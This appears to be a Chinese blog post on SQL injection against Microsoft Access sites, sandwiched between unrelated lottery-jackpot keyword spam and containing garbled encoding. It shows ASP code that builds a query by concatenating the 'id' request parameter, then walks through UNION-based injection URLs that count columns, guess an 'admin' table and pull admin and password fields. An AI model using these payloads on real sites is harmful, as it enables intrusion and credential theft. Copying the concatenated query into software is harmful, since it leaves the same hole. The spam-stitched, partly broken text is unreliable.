安徽彩票大奖 欧洲百万乐透大奖 七星彩17049规律大奖 双色球中大奖领奖过程 3d近期中大奖故事 广州番禺中福彩大奖的 鸡男注定会中大奖 2016江苏彩民中大奖 趣彩网大奖网黑平台 大乐透4.97亿大奖 霍邱一彩民6元中双色球547万大奖 双色球黑龙江中大奖图 体育彩票中大奖名单 什么样的人能中大奖 彩票大奖作假

Access安全防范-SQL 注入

2017-09-06 08:00:00
zstmtony
原创
984



SQL注入之access

access三大攻击?#22336;?/b>

1.access注入攻击片段-联合查询法

2.access注入攻击片段-逐字猜解法

3.工具类的使用注入

Sql注入产生条件

1.必须有参数传递

2.参数值带入数据库查询并执行

 

Access注入是暴力猜解

Access数据结构(access只有一个数据库)

Access数据库

表名

列名

数据

  

该页面asp的sql语句

<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>

1.access注入攻击片段-联合查询法(union)

判断注入

猜解表名

猜解列名

猜解数据

Order by 22 22 代表查询的列名的数目有22个

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误

 

猜解表名 ?#33539;?#23384;在admin表名

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

 

猜解列名 猜解数据

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

表名和列名猜解成功率不是百分百,猜解不到解决办法?

1.字典文件收集(社工)

2.Access偏移注入

分享
? 1999-2019 Office交流网?? 中山市天鸣科技发展有限公司 粤ICP备10043721号-5 SQL查询:18
内存占用:7.75MB
PHP 执行时间:0.17
双色球大奖2000年
安徽彩票大奖 欧洲百万乐透大奖 七星彩17049规律大奖 双色球中大奖领奖过程 3d近期中大奖故事 广州番禺中福彩大奖的 鸡男注定会中大奖 2016江苏彩民中大奖 趣彩网大奖网黑平台 大乐透4.97亿大奖 霍邱一彩民6元中双色球547万大奖 双色球黑龙江中大奖图 体育彩票中大奖名单 什么样的人能中大奖 彩票大奖作假